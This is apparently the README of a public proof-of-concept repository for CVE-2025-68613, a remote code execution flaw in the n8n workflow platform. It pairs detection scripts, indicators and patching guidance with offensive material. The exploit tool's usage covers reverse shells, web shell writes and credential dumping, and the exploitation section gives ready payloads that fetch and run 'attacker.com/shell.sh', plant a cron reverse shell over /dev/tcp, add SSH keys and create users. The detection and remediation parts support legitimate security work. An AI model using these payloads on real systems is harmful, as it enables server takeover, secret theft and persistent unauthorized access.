TheStingR/CVE-2025-68613-POC

🚨 CVE-2025-68613: Critical RCE Vulnerability in n8n

  • Language: Python
  • CVSS Score: 10.0 Critical
  • Exploit Status: Proof of Concept Available
  • CVE Status: CVE-2025-68613 Disclosed
  • Version: v1.0.2
  • Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

Table of Contents

  1. Overview
  2. What is n8n?
  3. Vulnerability Basics
  4. Technical Details
  5. Affected Versions
  6. Exploitation Mechanics
  7. Real-World Impact
  8. Detection Methods
  9. Remediation & Mitigation
  10. Resources & References

Overview

CVE-2025-68613 is a critical Remote Code Execution (RCE) vulnerability discovered in n8n, a popular open-source workflow automation platform. This vulnerability allows authenticated users to execute arbitrary code on the server, potentially leading to complete system compromise.

Quick Facts

  • CVE ID: CVE-2025-68613
  • CVSS Score: 9.9 - 10.0 (Critical)
  • Vulnerability Type: Expression Injection → Remote Code Execution
  • CWE: CWE-913 (Improper Control of Dynamically-Managed Code Resources)
  • Attack Vector: Network
  • Authentication Required: Yes (Low privilege - no admin access needed)
  • Status: Proof of Concept available (verified working on v1.121.0)

What is n8n?

n8n is an open-source workflow automation platform that allows users to:

  • Connect various APIs, databases, and services
  • Automate repetitive business processes
  • Create complex workflows without extensive coding
  • Deploy on-premises or in the cloud

Why n8n is Critical Infrastructure

Organizations use n8n to:

  • Integrate databases with cloud services
  • Automate data processing pipelines
  • Connect CRMs, ERPs, and internal systems
  • Manage sensitive data and API credentials

This central role in IT infrastructure makes vulnerabilities particularly dangerous, as they can provide attackers with access to entire networks and sensitive data.


Tools in This Repository

This repository includes ready-to-use tools for vulnerability detection and exploitation testing:

1. Scanner: cve-2025-68613-scanner.py

Purpose: Safe, non-exploiting detection of vulnerable n8n instances

Features:

  • Passive version detection from HTTP responses
  • No authentication required
  • No payload execution
  • Checks multiple common paths (/, /rest/settings, /healthz, /api/v1/health)
  • Safe for authorized security assessments

Usage:

python3 cve-2025-68613-scanner.py -u http://target:5678

Output:

  • Exit code 0: Not vulnerable
  • Exit code 1: Version undetermined (may be patched or hidden)
  • Exit code 2: Vulnerable version detected

2. Nuclei Template: CVE-2025-68613.yaml

Purpose: Automated vulnerability detection and basic expression evaluation testing

Features:

  • Requires valid authentication token
  • Tests expression injection capability
  • Attempts to read Node.js global context (process.platform)
  • Creates test workflows to validate RCE vector
  • CVSS 10.0 Critical severity classification

Usage:

# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. Full Exploit: exploit_cve-2025-68613.py

Purpose: Complete proof-of-concept exploit with multiple attack payloads

Features:

  • Full authentication handling
  • Multiple exploitation payloads:
    • info: Gather system information (OS, architecture, Node.js version, current user)
    • cmd: Execute arbitrary system commands
    • env: Extract all environment variables (reveals credentials, API keys, secrets)
    • read: Read sensitive files from filesystem (SSH keys, config files, etc.)
    • write: Write files to filesystem (persistence, backdoors, etc.)
    • revshell: Establish reverse shell connection for interactive access
  • Automatic workflow cleanup
  • Error handling and status reporting

Requirements:

  • Valid n8n user credentials (email/password)
  • Python 3.6+ with requests library
  • Network access to target n8n instance

Installation:

pip install requests
chmod +x exploit_cve-2025-68613.py

Usage Examples:

# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
  -e user@example.com -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
  -e user@example.com -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
  -e user@example.com -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
  -e user@example.com -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
  -e user@example.com -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
  -e user@example.com -p password --payload write \
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

How It Works:

  1. Authenticates to n8n using provided credentials
  2. Creates a malicious workflow with expression injection payload
  3. The payload breaks out of expression sandbox using this.constructor.constructor()
  4. Executes the payload via process.platform or other Node.js APIs
  5. Retrieves results from workflow execution
  6. Cleans up by deleting the test workflow

Exit Codes:

  • 0: Successful exploitation
  • 1: Authentication or exploitation failed

Vulnerability Basics

What's the Problem?

In simple terms: n8n allows users to write expressions in workflows to process data dynamically. However, these expressions are evaluated without proper sandboxing, allowing attackers to break out of the intended execution context and run arbitrary code on the server.

The Core Issue

When you create a workflow in n8n, you can use "expressions" to manipulate data. These expressions are supposed to run in a restricted environment. However, the vulnerability shows that these expressions can access the underlying system, allowing an attacker to:

  1. Execute system commands
  2. Read/write files on the server
  3. Steal environment variables (API keys, passwords, secrets)
  4. Modify or delete data
  5. Establish persistence for long-term access

Why It's So Dangerous

  • Low Barrier to Entry: Only requires a user login (no special admin privileges)
  • Wide Applicability: Many organizations allow non-technical users to create workflows
  • High Impact: Runs with full privileges of the n8n process
  • Data Access: Can access all data n8n has access to (databases, APIs, credentials)
  • Network Position: n8n often sits in the center of critical infrastructure, enabling lateral movement

Technical Details

How the Vulnerability Works

Step 1: Workflow Expression Evaluation

When a user creates a workflow in n8n, they can use expressions to process data:

Input: User creates a workflow with an expression
n8n Expression Engine: Evaluates the expression
Expected Output: Processed data
Actual Output (Vulnerable): Expression execution context not isolated from runtime

Step 2: Expression Injection

An attacker crafts a malicious expression that escapes the intended sandbox:

// Example: Malicious expression in workflow
${require('child_process').execSync('id')}

Step 3: Code Execution

The expression is evaluated without proper isolation, allowing the attacker to:

  • Call system functions
  • Execute shell commands
  • Access the file system
  • Read environment variables

The Root Cause

The vulnerability stems from insufficient sandboxing in the expression evaluation engine. n8n evaluated expressions in a context that:

  • Allowed access to require() or similar module loading functions
  • Didn't properly restrict access to system APIs
  • Didn't validate or filter expression syntax
  • Didn't prevent prototype pollution attacks
  • Didn't isolate the execution environment from the underlying Node.js runtime

Code Execution Path

User Input (Workflow Expression)
    ↓
Expression Parser
    ↓
Evaluation Engine (VULNERABLE - Not Sandboxed)
    ↓
Direct Access to Node.js Runtime
    ↓
System Command Execution / File Access / Credential Theft

Affected Versions

Vulnerable Range

All n8n versions starting from 0.211.0 through the following versions are vulnerable:

  • 0.211.0 through 1.120.3
  • 1.121.0

Patched Versions

The vulnerability has been fixed in:

  • 1.120.4 and later in the 1.120.x branch
  • 1.121.1 and later in the 1.121.x branch
  • 1.122.0 and all newer versions

How to Check Your Version

# If n8n is running
curl http://your-n8n-instance:5678/ | grep -i "version"

# Or check the admin panel
# Go to Settings → About → Version

Tested Versions & Compatibility

Verified Working

  • n8n v1.121.0: ✅ Fully exploitable (confirmed RCE, expression injection working)
  • n8n v0.211.0 - v1.120.3: ✅ Within vulnerable range per NVD (not individually tested)

Known Issues

  • REST Execution Limitation: The /rest/workflows/{id}/run endpoint returns an HTTP 500 error in v1.121.0
    • Workaround: Expression injection works perfectly; RCE was confirmed via:
      1. Manual "Test Step" button click in UI (proven to work)
      2. Workflow output capture
    • This is an API limitation, not an exploit bug

Not Tested

  • n8n v0.212.0+: Outside documented vulnerability range, likely patched (see GitHub issue #1)
  • Windows Server deployments: Limited testing data on Windows-specific environments

Version Support Statement

The exploit is designed to work against the vulnerable range documented in NVD:

  • Confirmed vulnerable: 0.211.0 through 1.120.3, plus 1.121.0
  • Patched versions: 1.120.4, 1.121.1, 1.122.0 and later

If testing against versions outside this range, success is not guaranteed.


Exploitation Mechanics

What Can an Attacker Do?

Once an authenticated user (or an attacker with valid credentials) exploits this vulnerability, they can:

1. Execute Arbitrary System Commands

${require('child_process').execSync('whoami').toString()}
// Returns: root (or whatever user runs n8n)

${require('child_process').execSync('curl attacker.com/shell.sh | bash').toString()}
// Downloads and executes a shell script

2. Read Files from the Server

${require('fs').readFileSync('/etc/passwd', 'utf-8')}
// Reads sensitive system files

${require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf-8')}
// Steals SSH keys

3. Read Environment Variables

${Object.keys(process.env).join(', ')}
// Lists all environment variables

${process.env.DATABASE_PASSWORD}
// Extracts specific secrets

4. Write Malicious Files

${require('fs').writeFileSync('/var/www/shell.php', 'malicious code')}
// Plants a web shell for persistence

${require('fs').writeFileSync('/home/user/.ssh/authorized_keys', 'attacker_key')}
// Adds SSH access

5. Access Connected Services

// Access workflow credentials (stored API keys, passwords)
// Modify or view connected databases
// Exfiltrate data from all integrated systems

6. Establish Persistence

${require('child_process').execSync('echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1" | crontab -')}
// Creates a cron job for reverse shell access

${require('child_process').execSync('useradd -m -s /bin/bash attacker')}
// Creates a new user account

Attack Scenario Example

Real-World Scenario: Company Using n8n

  1. Attacker gains credentials: Through phishing, credential reuse, or weak password
  2. Logs into n8n: Uses legitimate user account
  3. Creates a "harmless" workflow: Claims it's for data processing
  4. Injects malicious expression: Hides the exploit in a workflow step
  5. Executes code: Runs commands with n8n process privileges
  6. Exfiltrates data: Steals API keys, database credentials, customer data
  7. Establishes persistence: Installs backdoors, creates new admin accounts
  8. Moves laterally: Uses stolen credentials to access other systems

Real-World Impact

Confidentiality Impact (HIGH)

  • Access to sensitive data processed by workflows
  • Extraction of API keys, database passwords, encryption keys
  • Reading of configuration files, logs, and secrets
  • Potential GDPR/compliance violations through data theft

Integrity Impact (HIGH)

  • Modification of existing workflows to sabotage operations
  • Injection of malicious workflows that corrupt data
  • Alteration of workflow outputs affecting downstream systems
  • Planting of backdoors for persistent access

Availability Impact (HIGH)

  • Deletion of critical workflows, causing business disruption
  • Modification of system files leading to service crashes
  • Resource exhaustion through malicious automation
  • Ransom attacks where attackers demand payment to restore systems

Business Impact Examples

Manufacturing Company

  • n8n automates order processing and inventory management
  • Attacker exfiltrates customer orders and supplier information
  • Modifies workflows to send wrong products to customers
  • Results: Loss of customer trust, legal liability, operational disruption

Financial Services

  • n8n integrates banking APIs and payment processing
  • Attacker steals API credentials and auth tokens
  • Redirects transactions or creates fraudulent records
  • Results: Regulatory penalties, customer compensation, reputation damage

Healthcare Organization

  • n8n handles patient data integration and reporting
  • Attacker accesses protected health information (PHI)
  • Modifies medical records or blocks critical alerts
  • Results: HIPAA violations, patient harm, organization liability

Detection Methods

Method 1: Version Detection Scanner

Safe, non-exploiting detection script (included in original repository):

python3 CVE-2025-68613.py -u http://your-n8n-instance:5678

Output Examples

[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

Method 2: Using Nuclei Template

Automated scanning with Nuclei:

# Single target
nuclei -t CVE-2025-68613.yaml -u http://target:5678

# Multiple targets from file
nuclei -t CVE-2025-68613.yaml -l targets.txt

How it works:

  1. Sends HTTP requests to common n8n paths
  2. Extracts version metadata from HTML/headers
  3. Decodes base64 encoded config if present
  4. Compares version against vulnerable ranges
  5. Reports if instance is vulnerable

Method 3: Manual Banner Grabbing

# Check for n8n in HTTP response
curl -s http://target:5678/ | grep -i "n8n"

# Check headers
curl -I http://target:5678/ | grep -i "n8n"

# Check common paths
curl -s http://target:5678/api/v1/health
curl -s http://target:5678/rest/settings
curl -s http://target:5678/healthz

Method 4: Network Reconnaissance

# Find n8n instances using Shodan
shodan search "n8n" --limit 10

# Use favicon hash detection
nmap -p 5678 --script http-favicon target.com

Indicators of Exploitation (IOCs)

Log Signs:

  • Unusual expression evaluations in workflow logs
  • Expression errors containing system commands
  • Access to sensitive files (e.g., /etc/passwd references)
  • Unexpected process spawning from n8n process

System Signs:

  • New user accounts created on the server
  • Unexpected SSH keys in authorized_keys
  • New cron jobs or scheduled tasks
  • Modifications to system files
  • Reverse shell connections from n8n server
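A way to hunt for the log and expression indicators listed above in exported workflow JSON, as an added example (not the repository's tooling): it walks every parameter string in n8n's nodes[].parameters export layout, treats only expression strings (leading "=" or "${...}") as code, and matches them against the payload shapes this README documents. The sample workflow is constructed.

```python
"""Scan an exported n8n workflow for expression-injection indicators
(added example; not the repository's tooling).

Indicator patterns come from the payload shapes this README documents:
require()/child_process, this.constructor.constructor, process.env,
fs read/write calls and the /dev/tcp reverse-shell idiom.
"""
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

# (label, pattern). Kept narrow so ordinary data expressions are not flagged.
INDICATORS = [
    ("module-load",    re.compile(r"\brequire\s*\(|\bimport\s*\(")),
    ("child_process",  re.compile(r"child_process|\bexecSync\b|\bspawnSync\b")),
    ("sandbox-escape", re.compile(r"constructor\s*\.\s*constructor")),
    ("env-access",     re.compile(r"\bprocess\s*\.\s*env\b")),
    ("filesystem",     re.compile(r"\breadFileSync\b|\bwriteFileSync\b")),
    ("reverse-shell",  re.compile(r"/dev/tcp/|\bbash\s+-i\b")),
]


def iter_strings(obj: Any, path: str = "") -> Iterator[Tuple[str, str]]:
    """Yield (json_path, value) for every string leaf in a nested structure."""
    if isinstance(obj, str):
        yield path, obj
    elif isinstance(obj, dict):
        for key, val in obj.items():
            yield from iter_strings(val, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from iter_strings(val, f"{path}[{idx}]")


def is_expression(value: str) -> bool:
    """n8n stores expressions with a leading '='; the README's payloads use
    '${...}', so both forms are treated as code rather than literal text."""
    return value.startswith("=") or "${" in value


def scan_workflow(workflow: Dict[str, Any]) -> List[Dict[str, str]]:
    """Return one finding per (node, parameter, indicator) match."""
    findings: List[Dict[str, str]] = []
    for node in workflow.get("nodes", []):
        for path, value in iter_strings(node.get("parameters", {})):
            if not is_expression(value):
                continue  # literal text (notes, labels) is never evaluated
            for label, rx in INDICATORS:
                if rx.search(value):
                    findings.append({"node": node.get("name", "?"),
                                     "parameter": path, "indicator": label})
    return findings


# Constructed sample export in n8n's nodes[].parameters layout: one benign
# expression, a sticky note that merely mentions require(), and three
# parameters carrying payload shapes taken from this README.
SAMPLE_WORKFLOW: Dict[str, Any] = {
    "name": "Daily report",
    "nodes": [
        {"name": "Greeting", "type": "n8n-nodes-base.set", "parameters": {
            "values": {"string": [
                {"name": "msg", "value": "={{ 'Hello ' + $json.customer }}"}]}}},
        {"name": "Note", "type": "n8n-nodes-base.stickyNote", "parameters": {
            "content": "Reminder: require() is not allowed in expressions"}},
        {"name": "Export", "type": "n8n-nodes-base.set", "parameters": {
            "values": {"string": [
                {"name": "a", "value": "${require('child_process').execSync('id')}"},
                {"name": "b", "value": "={{ process.env.DATABASE_PASSWORD }}"},
                {"name": "c", "value": "={{ this.constructor.constructor }}"}]}}},
    ],
}

if __name__ == "__main__":
    for finding in scan_workflow(SAMPLE_WORKFLOW):
        print(json.dumps(finding))
```

Run it against the output of `n8n export:workflow --all` to review every workflow on an instance; the sticky note shows why literal text is skipped while expression strings are not.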

Remediation & Mitigation

PRIMARY SOLUTION: Immediate Upgrade

This is the only complete fix for the vulnerability.

Step 1: Backup Your Data

# Backup n8n database
cp -r /path/to/n8n/database ./backup/

# Backup workflows (n8n CLI; writes one JSON file per workflow)
n8n export:workflow --backup --output=./backup/

Step 2: Update n8n

Using Docker (Recommended):

# Pull the latest patched version
docker pull n8nio/n8n:1.122.0  # Or later

# Stop current instance
docker stop n8n-container

# Start with new version
docker run -d --name n8n-patched \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.122.0

Using npm:

# Backup first
n8n export:workflow --backup --output=./backup/

# Update
npm update n8n

# Or specific version
npm install n8n@1.122.0

Using System Package Manager:

# Debian/Ubuntu
sudo apt update && sudo apt upgrade n8n

# Or manual download
wget https://github.com/n8n-io/n8n/releases/download/n8n@1.122.0/n8n.tar.gz

Step 3: Verify the Update

# Check version after update
curl http://localhost:5678/api/v1/health | grep version

# Ensure n8n is running
curl http://localhost:5678/ | grep -i "n8n"

TEMPORARY MITIGATION: While Upgrading

Important: These do NOT fix the vulnerability. Use only as temporary measures while planning upgrades.

1. Restrict Workflow Permissions

n8n Admin Panel → Users & Permissions
├── Disable "User Can Create Workflows" for non-admin users
├── Restrict "User Can Edit Workflows" to trusted administrators only
├── Review existing user roles and remove unnecessary permissions
└── Audit workflow creators for suspicious accounts

2. Monitor Workflow Changes

n8n Admin Panel → Settings → Audit Log
├── Enable comprehensive audit logging
├── Monitor for suspicious workflow modifications
├── Alert on expression evaluations in logs
└── Review workflow change history regularly

3. Network Isolation

# Restrict n8n network access
sudo ufw default deny incoming
sudo ufw allow from 192.168.1.0/24 to any port 5678  # Only internal network
sudo ufw enable

# Or using iptables
sudo iptables -A INPUT -p tcp --dport 5678 -s 192.168.1.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5678 -j DROP

4. Run n8n with Minimal Privileges

# Create dedicated n8n user
sudo useradd -r -s /bin/false n8n-user

# Run n8n as this user
sudo -u n8n-user n8n

# Or in Docker with user specification
docker run -u 1000 n8nio/n8n:latest

5. Enable Strong Authentication

n8n Admin Panel → Settings → Authentication
├── Enable 2FA for all accounts
├── Enforce strong password policies
├── Review and disable unnecessary service accounts
├── Implement SSO if available
└── Disable any guest/demo accounts

6. Containerization & Isolation

# Run n8n in a restricted Docker container
docker run -d \
  --security-opt=no-new-privileges:true \
  --read-only \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --tmpfs /tmp \
  -p 5678:5678 \
  n8nio/n8n:current-version

7. Regular Auditing

# Monitor for suspicious activities
# Check for new files in n8n directories
find /path/to/n8n -type f -mtime -1

# Monitor process activity
ps aux | grep n8n
netstat -tlnp | grep n8n

# Check for unauthorized SSH keys
cat ~/.ssh/authorized_keys

# Review system logs
journalctl -u n8n -n 100

Risk Assessment Matrix

| Scenario | Risk Level | Likelihood | Impact | Priority |
|---|---|---|---|---|
| Unpatched, internet-facing n8n | CRITICAL | HIGH | Complete compromise | 🔴 URGENT |
| Unpatched, internal-only n8n | HIGH | MEDIUM | Insider threat risk | 🟠 HIGH |
| Patched n8n | LOW | LOW | N/A | ✅ Resolved |
| Unpatched + permission restrictions | MEDIUM | MEDIUM | Limited to trusted users | 🟡 MEDIUM |

Step-by-Step Recovery If Compromised

Immediate Actions (First Hour)

  1. Isolate the system: Disconnect from network
  2. Stop the service: sudo systemctl stop n8n
  3. Preserve logs: Back up all logs before wiping
  4. Alert team: Notify security team and management
  5. Assess scope: Determine what data n8n accessed

Investigation (First Day)

  1. Review audit logs: Check for suspicious activities
  2. Analyze network traffic: Look for data exfiltration
  3. Check file modifications: Find planted backdoors
  4. Review user accounts: Look for new or modified accounts
  5. Credential audit: Reset all API keys and passwords used by n8n

Remediation (Days 2-7)

  1. Full system rebuild: Don't just update, rebuild from clean image
  2. Credential rotation: Reset all passwords, API keys, tokens
  3. Patch everything: Update all connected systems
  4. Restore from backup: Use clean backups from before compromise
  5. Security audit: Conduct full security assessment

Post-Incident (Weeks 2+)

  1. Implement monitoring: Set up continuous logging and alerting
  2. Process changes: Update incident response procedures
  3. User training: Educate teams on security best practices
  4. Vulnerability scanning: Regular scans for similar issues
  5. Compliance review: Ensure all regulations met (GDPR, HIPAA, etc.)

Prevention Going Forward

Security Best Practices for n8n

  1. Keep n8n Updated

    • Enable automatic updates if available
    • Subscribe to n8n security advisories
    • Test patches in staging before production
  2. Access Control

    • Use principle of least privilege
    • Require strong passwords and 2FA
    • Implement SSO for enterprise deployments
    • Regular access reviews and audits
  3. Workflow Management

    • Review all workflows for suspicious logic
    • Implement code review process for workflows
    • Use naming conventions to identify critical workflows
    • Backup workflows regularly
  4. Credential Management

    • Never store credentials in workflows
    • Use environment variables for sensitive data
    • Rotate credentials regularly
    • Audit credential access
  5. Monitoring & Logging

    • Enable comprehensive audit logging
    • Monitor for unusual activities
    • Set up alerts for suspicious operations
    • Regular log review and analysis
  6. Network Security

    • Run n8n in isolated network segments
    • Restrict network access to required services only
    • Use VPN/firewall for remote access
    • Monitor network traffic for anomalies
  7. Incident Response

    • Create incident response plan
    • Define escalation procedures
    • Conduct regular security drills
    • Maintain updated contact lists

Troubleshooting

Issue: "Exit code 1: Authentication or exploitation failed"

Common Causes:

  1. Wrong credentials (most common)

    • Solution: Verify credentials work for web UI login first
    • Try: curl -X POST http://target:5678/rest/login -d '{"emailOrLdapLoginId":"user@example.com","password":"pass"}'
  2. User doesn't have workflow creation permissions

    • Solution: Use an admin or user account with workflow creation rights
    • Verify: Check admin panel → Users & Permissions
  3. Version is patched (version > 1.121.0)

    • Solution: Use the scanner to check version first: python3 cve-2025-68613-scanner.py -u http://target:5678
    • Expected: Scanner should report "Vulnerable" (exit code 2)
  4. API structure changed (older/newer versions may differ)

  5. Network/firewall blocking

    • Solution: Verify connectivity: curl http://target:5678/
    • Check: Firewall rules, proxy settings, SSL certificates

Issue: Scanner reports false positives (detecting wrong version)

Fixed in v1.02: Scanner now uses base64-decoded Sentry configuration from meta tags instead of simple regex. This eliminates false positives where Node.js version was detected as n8n version.

What changed:

  • Primary source: Extract and decode <meta name="n8n:config:sentry" content="[BASE64]">
  • Fallback: Only uses regex if Sentry config unavailable
  • Result: Accurate version detection with no false positives
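The two pieces of scanner logic this README describes, the v1.02 Sentry meta-tag decoding above and the vulnerable/patched ranges from Affected Versions, as one added example (not the repository's scanner): it prefers the base64 `n8n:config:sentry` content, falls back to a bare regex, and maps the result to the README's exit codes. The `release` key inside the decoded blob and the sample page are assumptions/constructed.

```python
"""Version check for CVE-2025-68613 (added example, not the repo's scanner).

Ranges are the ones this README states:
  vulnerable: 0.211.0 .. 1.120.3 and 1.121.0
  patched:    1.120.4+ (1.120.x), 1.121.1+ (1.121.x), 1.122.0 and later
"""
import base64
import json
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Inclusive (low, high) ranges the README lists as affected.
VULNERABLE_RANGES = [((0, 211, 0), (1, 120, 3)), ((1, 121, 0), (1, 121, 0))]

VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")
# Meta tag named in the README's v1.02 scanner notes; its content is base64.
SENTRY_META_RE = re.compile(
    r'<meta\s+name="n8n:config:sentry"\s+content="([^"]+)"', re.IGNORECASE)


def parse_version(text: str) -> Optional[Version]:
    """Return the first x.y.z triple found in text, or None."""
    m = VERSION_RE.search(text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def classify(version: Version) -> str:
    """'vulnerable', 'patched', or 'outside_documented_range' (below 0.211.0)."""
    for low, high in VULNERABLE_RANGES:
        if low <= version <= high:
            return "vulnerable"
    if version >= (1, 120, 4):
        return "patched"  # 1.120.4+, 1.121.1+ and 1.122.0+ all land here
    return "outside_documented_range"


def extract_version(html: str) -> Optional[Version]:
    """Prefer the base64 Sentry config (the v1.02 fix); fall back to a bare
    regex over the page, which can mistake a Node.js version for n8n's."""
    m = SENTRY_META_RE.search(html)
    if m:
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = ""
        found = parse_version(decoded)
        if found:
            return found
    return parse_version(html)


def exit_code_for(html: str) -> int:
    """Mirror the README's scanner exit codes:
    0 not vulnerable, 1 version undetermined, 2 vulnerable."""
    found = extract_version(html)
    if found is None:
        return 1
    return 2 if classify(found) == "vulnerable" else 0


# Constructed sample page. The Sentry blob is {"release": "n8n@1.120.2"}
# ("release" is an assumed key) and the body carries a decoy Node.js
# version that the naive regex would report instead.
SAMPLE_HTML = (
    '<html><head><meta name="n8n:config:sentry" content="'
    + base64.b64encode(json.dumps({"release": "n8n@1.120.2"}).encode()).decode()
    + '"></head><body>Powered by Node.js 20.11.1</body></html>'
)

if __name__ == "__main__":
    print("naive regex:", parse_version(SAMPLE_HTML))    # (20, 11, 1)
    print("sentry meta:", extract_version(SAMPLE_HTML))  # (1, 120, 2)
    print("exit code:", exit_code_for(SAMPLE_HTML))      # 2
```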

To use v1.02 scanner:

# Update to v1.02
git pull origin main

# Run scanner
python3 cve-2025-68613-scanner.py -u http://target:5678

Issue: REST execution returns 500 error

This is NOT a bug in the exploit - it's an API limitation.

Explanation:

  • The /rest/workflows/{id}/run endpoint returns HTTP 500 in n8n v1.121.0
  • This is an n8n API design limitation, not an exploit bug
  • Expression injection STILL WORKS through the UI

Workaround:

  1. Exploit creates workflow with malicious expression ✅ Works
  2. Expression evaluates and executes code ✅ Works (proven with manual testing)
  3. Manually click "Test Step" button in UI to trigger expression ✅ Works
  4. Read output from workflow results ✅ Works

Evidence: Captured flag on TryHackMe: THM{n8n_exposed_workflow}


Resources & References

Official Sources

CVE Information

Security Resources


Summary

CVE-2025-68613 is a critical vulnerability that requires immediate action. The combination of:

  • Expression injection capability
  • Lack of sandboxing
  • Low privilege requirements
  • Wide attack surface (many users create workflows)
  • Central position in IT infrastructure

...makes this one of the most dangerous vulnerabilities in workflow automation platforms.

The simple solution: Upgrade to a patched version immediately. There is no excuse for remaining vulnerable to a critical RCE when patches are available.


Document Version

  • Version: 1.02
  • Date Created: December 18, 2025
  • Last Updated: December 26, 2025

  • Status: Complete
  • Author: The StingR / TechSquad Inc.
  • Organization: TechSquad Inc.

Disclaimer

This document is provided for educational and authorized security assessment purposes only. Unauthorized access to computer systems is illegal. Always ensure you have proper authorization before testing, assessing, or accessing systems you do not own.


⚠️ REMEMBER: Update your n8n instances immediately if running vulnerable versions.

About

Public PoC + Scanner and research for CVE-2025-68613: Critical RCE in n8n Workflow Automation via Expression Injection (CVSS 10.0). Includes detection tools, full exploit, and remediation guidance.
